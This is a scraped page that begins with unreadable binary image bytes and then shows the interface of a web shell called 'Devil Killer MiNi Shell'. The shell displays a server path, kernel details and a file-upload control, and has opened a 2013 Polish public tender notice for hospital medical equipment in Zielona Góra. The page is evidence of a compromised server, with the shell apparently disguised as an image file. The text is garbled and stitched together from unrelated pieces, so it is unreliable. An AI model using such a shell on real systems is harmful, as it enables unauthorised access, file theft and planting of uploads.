JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/324460-N-2013.html

<p class="kh_header"><b>Zielona Góra: Dostawa sprzętu medycznego dla SP ZOZ MSW w Zielonej Górze</b><br>
<b>Numer ogłoszenia: 324460 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład  Opieki Zdrowotnej MSW , ul. Wazów 42, 65-044 Zielona Góra, woj. lubuskie, tel. 68 4527700, faks 68 4527702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poliklinika.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu medycznego dla SP ZOZ MSW w Zielonej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż i dostawa sprzętu medycznego. W ramach przedmiotu zamówienia Wykonawca jest zobowiązany do dostarczenia i złożenia całości przedmiotu zamówienia w miejscach wskazanych w jego siedzibie, montażu (instalacji) urządzeń tego wymagających, ich uruchomienia, wykonania testów sprawdzających oraz przeszkolenia pracowników do jego obsługi. Wykonawca zobowiązany jest dostarczyć urządzenia (przedmioty) I gatunku, fabrycznie nowe, odpowiednio oznakowane, posiadające wymagane prawem certyfikaty bezpieczeństwa oraz udzielić gwarancji na sprzedane 
i dostarczone urządzenia oraz przedmioty, a także stosownie do przedmiotu dostawy - posiadające dokumentację techniczną w języku polskim, niezbędną do korzystania przez Zamawiającego z wyrobu taką jak: gwarancie, instrukcje, opisy techniczne, schematy, itp. Jednocześnie Zamawiający wymaga, aby urządzenia (przedmioty) spełniały polskie normy wymagane przepisami prawa oraz posiadały odpowiednie certyfikaty  (CE) lub deklaracje zgodności. Całość w/w dokumentacji zostanie dostarczona wraz z urządzeniami (produktami). Oprogramowanie do urządzeń ma być w języku polskim.Wykonawca zapewni autoryzowany, bezpłatny gwarancyjny serwis urządzeń w terminie wynoszącym nie dłużej niż 5 dni roboczych od chwili zgłoszenie niewłaściwego działania urządzenia. Czas naprawy w okresie gwarancyjnym i pogwarancyjnym wynosił będzie 3 dni robocze. W przypadku niemożliwości naprawy urządzeń w ciągu 3 dni roboczych, Wykonawca w ciągu następnych 5 dni roboczych dostarczy urządzenia zastępcze.Wykonawca jest zobowiązany dołączyć do oferty opisy zaoferowanych urządzeń ze wskazaniem producenta oraz nazwy handlowej i typu urządzenia. Zamawiający dopuszcza możliwość składania na poszczególne części ofert równoważnych pod warunkiem, że zaproponowane produkty będą równoważne pod względem parametrów technicznych, eksploatacyjnych i użytkowych. W przypadku produktu równoważnego należy przedstawić Zamawiającemu stosowny opis zaproponowanego produktu równoważnego. Przedmiotowy opis należy dołączyć do składanej oferty.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.70.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie precyzuje się</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie precyzuje się</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie precyzuje się</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie precyzuje się</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie precyzuje się</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy do złożonej oferty (załącznik nr 1 do SIWZ) są zobowiązani ponadto dołączyć następujące dokumenty: 1) pełnomocnictwo, jeżeli zachodzą okoliczności
powodujące konieczność dołączenia do oferty takiego dokumentu; 2) opis produktu równoważnego, jeżeli zachodzą okoliczności powodujące konieczność dołączenia do
oferty takiego dokumentu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają dla swej ważności aneksu w formie pisemnej pod rygorem nieważności. Istotne zmiany umowy mogą nastąpić w przypadku: 1)zmiany
terminu wykonania zamówienia (czasu trwania), 2) zmiany obowiązujących przepisów prawa, 3) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz
Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poliklinika.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ MSW w Zielonej Górze, sekretariat Dyrektora SP ZOZ MSW, ul. Wazów 42,
65-044 Zielona Góra, pok. 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2013 godzina 08:30, miejsce: SP ZOZ MSW w Zielonej Górze,
sekretariat Dyrektora SP ZOZ MSW, ul. Wazów 42, 65-044 Zielona Góra, pok. 29.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Aparat do wykonywania ciągłych terapii nerko zastępczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do wykonywania ciągłych terapii nerko zastępczych - rok produkcji - 2013 r.; możliwość wykonania zabiegu ciągłej żylno - żylnej hemofiltracji (CVVH); możliwość wykonywania zabiegu wysoko objętościowej ciągłej żylno - żylnej hemofiltracji (HV - CVVH); substytucja podawana jednocześnie przed 
i po hemofiltrze; możliwość wykonania zabiegu żylno - żylnej hemodializy (CVVHD); możliwość wykonania zabiegu żylno - żylnej hemodiafiltracji (CVVHDF); możliwość wykonania zabiegu powolnej ciągłej ultrafiltracji (SCUF); możliwość wykonania zabiegu plazmaferezy (PF); możliwość wykonania zabiegu hemoperfuzji (HP); graficzny kolorowy podgląd istotnych stanów pracy urządzenia; bateria, która w przypadku braku zasilania sieciowego, zapewni pracę aparatu przez co najmniej 15 min.; regulowana ultrafiltracja 0 - 100 ml/min.; przepływ płynu substytucyjnego od 10 - 160 ml/min; przepływ dializatu od 10 - 70 ml/min; dwa indywidualne systemy 
do podgrzewania płynu substytucyjnego i dializatu z możliwością wyłączenia w trakcie zabiegu; możliwość regulacji temperatury w zakresie 35 - 39 oC; regulacja przepływu pompy krwi od 10 - 500 ml/min; kasetowy system drenów umożliwiający łatwy i szybki montaż oraz wielokrotną wymianę samego filtra w trakcie zabiegu, bez konieczności wymiany całej kasety; system bilansujący: cztery niezależne wagi do płynów dializacyjnych, substytucyjnych, osocza, ultrafiltratu, itp.; dokładność ważenia - 1 g; najwyższy stopień ochrony przeciwporażeniowej (CF) umożliwiający bezpieczną defibrylację pacjenta podczas zabiegu; cztery pompy umożliwiające podaż i oddawanie krwi, płynu dializacyjnego, substytucyjnego, ultrafiltratu lub osocza; odpowietrzanie drenów substytutu, dializatu, filtratu - niezależne; możliwość jednoczasowego podłączenia 4 worków  po 5 litrów z płynem dializacyjnym; moduł cytrynian - wapń: pompa i kroplomierz antykoagulantu cytrynianowego oraz pompa i kroplomierz roztworu wapnia. Roztwory podawane do pozaustrojowego układu drenów krwi; ciągła hemodializa/hemodiafiltracja z regionalną antykoagulacją cytrynianową (CVVHD lub CVVHDF CiCa); detektor przecieku krwi; dwa niezależne detektory powietrza; dwie niezależne pułapki powietrza (za i przed hemofiltrem); oprogramowanie i komunikacja w języku polskim. Paszport techniczny urządzenia. Dodatkowo sukcesywna dostawa w przeciągu 12 m-cy od dnia podpisania umowy niezbędnych akcesoriów i płynów do: terapii hemodializy cytrynianowej, przy założeniu, że miesięcznie znajdzie się jeden pacjent (1 zabieg/m-c) oraz jeden pacjent do terapii ciągłego odwodnienia (2 zabiegi/m-c) wraz z niezbędnymi akcesoriami i płynami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.18.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zmotoryzowana szyna do ćwiczeń stawu barkowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zmotoryzowana szyna do ćwiczeń stawu barkowego -  szyna zintegrowana z fotelem 
o miękkim obiciu w pełni dezynfekowalnym z regulowaną pozycją oparcia pleców i zdrowego ramienia; fotel wyposażony w kółka transportowe.; aparat umożliwiający wykonywanie ruchów wielopłaszczyznowych i ćwiczeń zgodnych z koncepcją PNF; kontrola wszystkich parametrów za pomocą pilota sterującego z blokadą 
przed przypadkową zmianą parametrów w pilocie; podświetlany wyświetlacz LCD minimum 320x240 pikseli 
z regulacją kontrastu; możliwość kontrolowanego oporowania ruchu szyny przez pacjenta ze zmianą kierunku w dowolnym punkcie ustawionego zakresu co najmniej w 25 poziomach siły; dwa silniki z możliwością wyboru synchronizacji lub braku synchronizacji pracy; możliwość prowadzenia ruchów izolowanych - wyłączenia poszczególnych silników; regulacja prędkości pracy co najmniej w 100 poziomach; stabilizacja obręczy barkowej w celu uniknięcia kompensacji ruchu przez pacjenta z regulowaną pozycją; automatyczne poszerzenie ruchu 
w wybranym kierunku odwodzenia/podnoszenia, rotacji wewnętrznej i zewnętrznej, kontrolowane zmianą prędkości i regulacją siły oddziaływania; sekwencyjne programy terapii realizujące naprzemiennne ruchy izolowane, powtarzane oscylacyjnie krańcowe zakresy ruchów oraz program rozgrzewki stawu; dokumentacja przebiegu terapii - rejestr wyników ćwiczeń w formie graficznej oddzielnie dla odwodzenia i rotacji; dezynfekcja 
- urządzenie spełnia zwiększone wymagania aparatury medycznej w zakresie dezynfekcji. zasilanie elektryczne 220 - 240 V 50/60 Hz; wbudowany transformator - bezpieczne napięcie zasilania silników 24 V; masa do 25 kg; aparat zgodny z normą IEC 60601-1-2:2001 kompatybilności elektromagnetycznej; aparat nowy - data produkcji nie wcześniej 2013 rok; całodobowa telefoniczna pomoc techniczna Wykonawcy. Paszport techniczny urządzenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zmotoryzowana szyna do ćwiczeń stawu biodrowego i kolanowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zmotoryzowana szyna do ćwiczeń stawu biodrowego i kolanowego - aparat dla dorosłych 
i dzieci z zakresem wymiarów uda od 31 do 49 cm i podudzia od 25 do 57 cm;  zastosowany układ kinematyczny gwarantujący zgodność ruchu szyny z fizjologią zginania stawu w pełnym zakresie; zastosowanie na kończynę prawą - lewą bez przebudowy; regulowana pozycja oparć uda, podudzia i stopy za pomocą bloczków zaciskowych; oparcia kończyny wykonane z elastycznego tworzywa typu PUR-foam z certyfikatem biokompatybilności; oskalowane elementy szyny z wymiarami dla uda i podudzia; zakres ruchu w stawie kolanowym minimum -10° - 0°
- 120°; zakres ruchu w stawie biodrowym minimum 0° - 7° - 115°; regulacja pozycji stawu skokowego w zakresie zginania podeszwowego/grzbietowego bez ograniczeń, a  w zakresie inwersji/ewersji od 40° do 40°, wraz zachowaniem możliwości aktywnego ruchu rezystancyjnego; kotwica tytanowa o średnicy 5 mm i 3,5 mm bezwęzłowa z podłużną blaszką w PEEK; kontrola wszystkich parametrów za pomocą pilota sterującego z blokadą przed przypadkową zmianą parametrów w pilocie; podświetlany wyświetlacz LCD minimum 320x240 pikseli 
z regulacją kontrastu; możliwość kontrolowanego oporowania ruchu szyny przez pacjenta ze zmianą kierunku 
w dowolnym punkcie ustawionego zakresu co najmniej w 25 poziomach siły; regulacja prędkości pracy co najmniej w 20 poziomach; program pełnej rozgrzewki stawu oraz sekwencyjne programy terapii; dokumentacja przebiegu terapii danego pacjenta w formie graficznej; automatyczne poszerzenie zgięcia/ wyprostu kontrolowane zmianą prędkości i regulacją siły oddziaływania; funkcja synchronizacji elektrostymulacji EMS 2 kanałowej; całodobowa telefoniczna pomoc techniczna Wykonawcy; aparat nowy - data produkcji nie wcześniej niż 2013 rok. Paszport techniczny urządzenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Aparat do magnetoterapii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do magnetoterapii - tryby pracy: programowy/manualny; ciekłokrystaliczny wyświetlacz znakowy; wybór jednostek chorobowych po nazwie; mikroprocesorowe sterowanie pracą aparatu; zegar zabiegowy 1:30 min; dwa całkowicie niezależne kanały aplikacyjne; cztery uniwersalne gniazda aplikatorów; automatyczne rozpoznawanie typu aplikatura; trwała i niezawodna klawiatura; typy pola: sinus, trójkąt, prostokąt półsinus, półtrójkąt, półprosto kąt; tryb mieszany: różne rodzaje pola w jednej sesji zabiegowej; emisja ciągła i modulowana; autotest - bieżąca kontrola sprawności aparatu ; maksymalna indukcja: 10mT/100Gs; parametry trybu modulowanego: impuls 1s/ przerwa 0,5-8s; zakres częstotliwości: 2-60Hz; zasilanie: 230V, 50Hz. Wyposażenie: Starownik aparatu, aplikator 60 cm, aplikator 35 cm, leżanka przesuwnik do aplikatura 60 cm, półka pod sterownik pola magnetycznego montowana do leżanki, stolik pod aplikator ok. 35 cm. Po zamontowaniu 
i uruchomieniu należy wykonać pomiary wielkości pola elektromagnetycznego. Paszport techniczny urządzenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Diatermia kondensatorowa i indukcyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Diatermia kondensatorowa i indukcyjna - ekranowane elektrody, przewody elektrod, 
oraz generatory; czteroprzegubowe ramiona elektrod umożliwiający duży zakres ustawień; znamionowa częstotliwość: 27,12 MHz; ekwiwalent mocy 400 W; moc na wejściu RF (-praca ciągła - 200W, nastawiana skokowo; - praca impulsowa - 30 W, nastawiana skokowo); parametry impulsów (- częstotliwość powtarzania impulsów - 70 Hz/350Hz; - szerokość impulsów - 2 ms/0,4 ms; moc w szczycie - 400 W); czas ekspozycji: 0d 0 
do 30 min. nastawiany skokowo; praca diatermii jest cały czas kontrolowana przez mikroprocesor; kontrola prawidłowości ustawień pacjenta względem elektrod; aparat po uruchomieniu przeprowadza autotest i potwierdza swą gotowość do pracy; każda nieprawidłowość w pracy urządzenia lub błąd w obsłudze sygnalizowany jest dźwiękowo i na wyświetlaczu; podczas wystąpienia nieprawidłowości urządzenie zeruje wartość emitowanej dawki; 2 ramiona do mocowania elektrod; 4 przewody do elektrod kondensatorowych; 2 elektrody kondensatorowe o śr. 13 cm +/- 3%; 2 elektrody kondensatorowe o śr 4 cm +/- 3%; 2 elektrody kondensatorowe o śr 8,5  cm +/- 3%; 2 triplody 15 x 35  cm +/- 3%; 2 elektrody indukcyjne śr  8 cm +/- 3%; 2 elektrody indukcyjne śr 14 cm +/- 3%; 2 przewody do elektrody indukcyjnej; wymiary (wys. x szer. x głęb.) 85 x 38 x 38 cm +/- 5%; masa maks. 40 kg; napięcie 230 V; pobór mocy maks 700 VA; pobór mocy przy pracy jałowej maks 100 VA; klasa ochronności 
i typ ochrony IP 20 BF. Po zamontowaniu i uruchomieniu należy wykonać pomiary wielkości pola elektromagnetycznego. Paszport techniczny urządzenia.</p></li>
